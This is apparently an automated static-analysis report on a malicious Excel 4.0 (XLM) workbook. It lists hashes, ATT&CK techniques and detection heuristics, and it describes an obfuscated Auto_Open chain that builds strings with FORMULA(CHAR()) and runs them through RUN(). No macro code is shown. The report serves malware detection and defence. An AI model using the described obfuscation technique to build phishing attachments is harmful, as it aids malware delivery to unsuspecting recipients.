Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e35942318c123c22…

MALICIOUS

Office (OLE)

Size: 286.0 KB
Created: 2020-05-15 13:14:57
Authoring application: Microsoft Excel
First seen: 2020-09-15
MD5: 440b05297e4cc761b5cc6e585080e3a5
SHA-1: 8e25e70dce143ec76588faf78f4a955b667c10b2
SHA-256: e35942318c123c2223894684026754aa0096c94b9c223c6829e7afcbef9e7f44
Risk Score: 140

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains obfuscated Excel 4.0 macros, including an Auto_Open entry, which is a critical indicator of malicious intent. The macros appear to construct a string using character manipulation and then execute it, likely to download and run a secondary payload. The presence of an Auto_Open entry suggests this file was intended to be delivered as a spearphishing attachment.

Heuristics (3)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • Obfuscated XLM Auto_Open execution chain [critical] OLE_XLM_OBFUSCATED_AUTOEXEC_CHAIN
    The Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and an obfuscated formula execution chain. The macro builds strings through FORMULA(CHAR(...)), primes state with SET.VALUE / GET.CELL / GOTO, and transfers control through RUN(). This is a high-confidence XLM malware pattern.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    The workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 126607 bytes
SHA-256: 555b6bcf75a49e471fdf5464563c408386460d27461940b8b1530a9415d21ec5
Preview script
First 1,000 lines of the extracted script